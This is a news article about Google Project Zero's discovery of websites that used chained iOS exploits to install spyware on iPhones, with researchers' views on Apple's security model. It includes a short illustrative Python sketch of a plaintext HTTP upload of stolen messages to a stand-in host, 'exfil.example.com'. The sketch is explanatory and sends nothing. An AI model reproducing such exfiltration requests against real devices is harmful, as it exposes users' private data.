Google's disclosure last night that malicious websites may have infected thousands of iPhones with spyware is not just a one-day story. It fundamentally changes the game for iOS security.
For the past 12 years, iOS has been the gold standard for operating-system security, a standard that the developers of Android, macOS and Windows could only aspire to. You could count on the fingers of one hand the instances of iOS malware ever found in the wild on non-jailbroken iPhones.
You could rely on iOS to keep you safe, unless you happened to be a well-known dissident in a repressive but relatively wealthy country. You didn't have to worry that Apple neither allows nor requires antivirus software.
Today, the number of known iOS exploits working in the wild has roughly doubled. Suddenly, iOS doesn't seem so safe anymore. If a relatively sloppy group of hackers could indiscriminately compromise iPhones for more than two years, including phones running the latest versions of iOS, how many other iOS hacking campaigns are out there?
"For this one campaign that we've seen, there are almost certainly others that are yet to be seen," said the Google Project Zero blog post that unveiled the malware campaign.
"That's pretty scary," Malwarebytes security researcher Thomas Reed wrote on Twitter. "iPhone infections are scarier because there's absolutely no way to tell if your phone is infected without expert help … and maybe not even then!"
So, frankly, how safe is your iPhone now? It seems a lot less safe than it did yesterday.
MORE: Best Mac Antivirus Software
So, what happened?
To bring you up to speed: Google Project Zero researcher Ian Beer published a series of long blog posts last night at about 8 p.m. Eastern time (midnight GMT), describing how Google's Threat Analysis Group, earlier this year, "discovered a small collection of hacked websites" being used in "indiscriminate watering hole attacks" against iPhone users.
Project Zero took a look, figured out what was going on, and told Apple about it. Within a week, Apple fixed the underlying bugs that made the attacks possible, with iOS 12.1.4 on Feb. 7. (Other bugs used in the attacks had already been fixed, but some iPhones would still have been vulnerable to them.)
Problem solved? In the short term, yes. But the fact that this went on for so long without anyone noticing, least of all Apple, really matters.
A market-changing revelation?
Working iOS exploits have been considered so rare and expensive that even well-funded nation-state attackers were thought to use them sparingly, and only against the highest-value targets.
Beer refers cryptically to "the million-dollar dissident" in his introductory post. That's a reference to a human rights activist in the United Arab Emirates whom someone tried, in 2016, to trick into clicking a link to a booby-trapped website that would have jailbroken the visitor's iPhone with a previously unknown iOS exploit and silently installed spyware.
One-click iOS exploits, which require minimal action from the target and leave no sign that the device has been compromised, have privately sold for up to $1 million. But their shelf life is short, because they are quickly patched once discovered, as happened with the one aimed at the UAE human rights activist: Apple patched that exploit three weeks after the activist spotted and reported it.
However, the websites found by Google's researchers used 14 different iOS vulnerabilities, chained together in various ways to create as many as five one-click iOS exploit chains. And they compromised not the iPhones of one or more targeted individuals specifically lured to those websites, but the iPhones of anyone who visited the sites.
Beer estimates that these sites receive "thousands of visitors per week." His use of the present tense suggests the websites may still be in operation.
He also found that the implementation of the exploits was sloppy. The attackers made no effort to encrypt the data their spyware sent back to the attackers' servers, or to disguise the servers storing that data. Anyone with a copy of Wireshark could have "sniffed" the unencrypted data as it traveled over a Wi-Fi network, a blog post published today noted. "This suggests that the exploits and the implant were developed not only by different teams, but by teams with dramatically different skill levels."
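To see why unencrypted exfiltration is so easy to spot, consider a minimal sketch of what a plaintext HTTP upload looks like on the wire. This is not the attackers' actual traffic; the host name and JSON field names below are invented for illustration. The point is that a passive observer, such as anyone running Wireshark on the same network, captures every byte in readable form:

```python
# A plaintext HTTP POST exactly as it would appear on the wire.
# Anyone capturing packets on the same Wi-Fi network sees these
# bytes verbatim; nothing is hidden without encryption.
# NOTE: host name and field names are hypothetical, for illustration only.
captured_packet = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: exfil.example.com\r\n"
    b"Content-Type: application/json\r\n"
    b"Content-Length: 49\r\n"
    b"\r\n"
    b'{"device": "iPhone", "messages": ["meet at 6pm"]}'
)

def sniff(packet: bytes):
    """Split a captured plaintext HTTP request into a header dict and
    a body, much as a packet analyzer would display it."""
    head, _, body = packet.partition(b"\r\n\r\n")
    lines = head.decode().split("\r\n")
    headers = dict(line.split(": ", 1) for line in lines[1:])
    return headers, body

headers, body = sniff(captured_packet)
print(headers["Host"])   # the exfiltration server's address, in the clear
print(body.decode())     # every byte of the stolen data, also in the clear
```

With HTTPS, the observer would see only the destination and an opaque encrypted stream, which is why skipping encryption here struck researchers as so amateurish.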
This could be an attacking group that doesn't care whether it loses millions of dollars' worth of working iOS exploits, or one that has reason to believe working iOS exploits are much less rare than we had thought.
Could Apple have caught this instead of Google?
Beer pointed out that burning all these zero-days in such a public way may still have been worth it to the attackers, despite the risk of discovery.
"I shan't get into a discussion of whether these exploits cost $1 million, $2 million, or $20 million," he wrote. "All of those price tags seem low for the capability to target and monitor the private activities of entire populations in real time."
But that leaves open the question of why it took so long for the exploits to be discovered. Marcus Hutchins, the man famous for stopping the WannaCry ransomware outbreak (and who faced criminal charges as an indirect result), believes Apple dropped the ball.
"Bug bounties are cool and all, but good telemetry" (the ability to see what your own software is doing on a network) "is far more important," Hutchins wrote on Twitter.
Speaking to Tom's Guide, Malwarebytes' Thomas Reed countered that Apple may not have been able to catch it.
"I'm not sure Apple could have spotted this, especially since the controls on iOS are so restrictive that visibility into an infection on the device is almost nonexistent," Reed told us. "There may, of course, be telemetry sent back to Apple that I don't know about that could have given Apple a clue … but I doubt it, given Apple's stance on privacy."
Visibility is part of the problem, Reed added. Unlike Android, iOS is a black box. Security researchers have a hard time analyzing it, and iOS users have no idea what the file system on their devices looks like, or even how much RAM their devices have.
"The fact that this went undiscovered for two years is pretty significant, and I think it tells an interesting story," he added. "Apple doesn't allow scanning of iOS devices in any way, but if that had been possible, this probably wouldn't have taken two years."
Alex Stamos, formerly chief security officer at Yahoo and Facebook and now a professor at Stanford, also blamed Apple's lack of transparency and near-total control over the iOS ecosystem, two things previously considered necessary to maintain high security standards.
"Lots of things to learn from this incident, but one of them is the security cost of anti-competitive iOS App Store policies," Stamos tweeted. "Chrome/Brave/Firefox have to use the built-in WebKit/JS" [to run on iOS, making them essentially skinned versions of Safari]. "If Apple isn't willing to take the steps necessary to protect users, they should leave it to others."
He listed three things Microsoft was accused of 20 years ago that arguably apply to Apple today: "rent-seeking on platform control," such as Apple's 30 percent cut of iOS app revenue; "content moderation on behalf of autocracies," a nod to Apple's cooperation with the Chinese government on censorship; and the "risk of software monoculture," whose results we can see in yesterday's disclosure.
How can we fix this?
The bottom line is that iOS now clearly has a security problem. I never expected to say that, but cracks in iOS's security facade had already begun to show: another batch of Google Project Zero disclosures revealed multiple iMessage bugs earlier this summer.
We asked Reed whether Apple might consider allowing third-party antivirus software on iOS devices, as Google does with Android.
"I don't think antivirus software on iOS is the answer," he replied. "Not only do I doubt that Apple would ever approve it, but it would also put potentially dangerous capabilities in the hands of iOS developers."
"What I think would be better is Apple-sanctioned file-system access on iOS devices," Reed said, adding that this should be possible only under tightly controlled conditions.
In the long run, knowing that iOS is not invulnerable could be a good thing. Apple seems to know it, too. Earlier this month, the company announced that it would give accredited researchers access to special iPhones that are easier to hack, and it raised the maximum bug bounty for iOS flaws discovered by independent researchers to $1.5 million.
Last night's revelations put Apple's transparency-enhancing decisions in a new light. Maybe Apple realizes that it now needs the hackers on its side.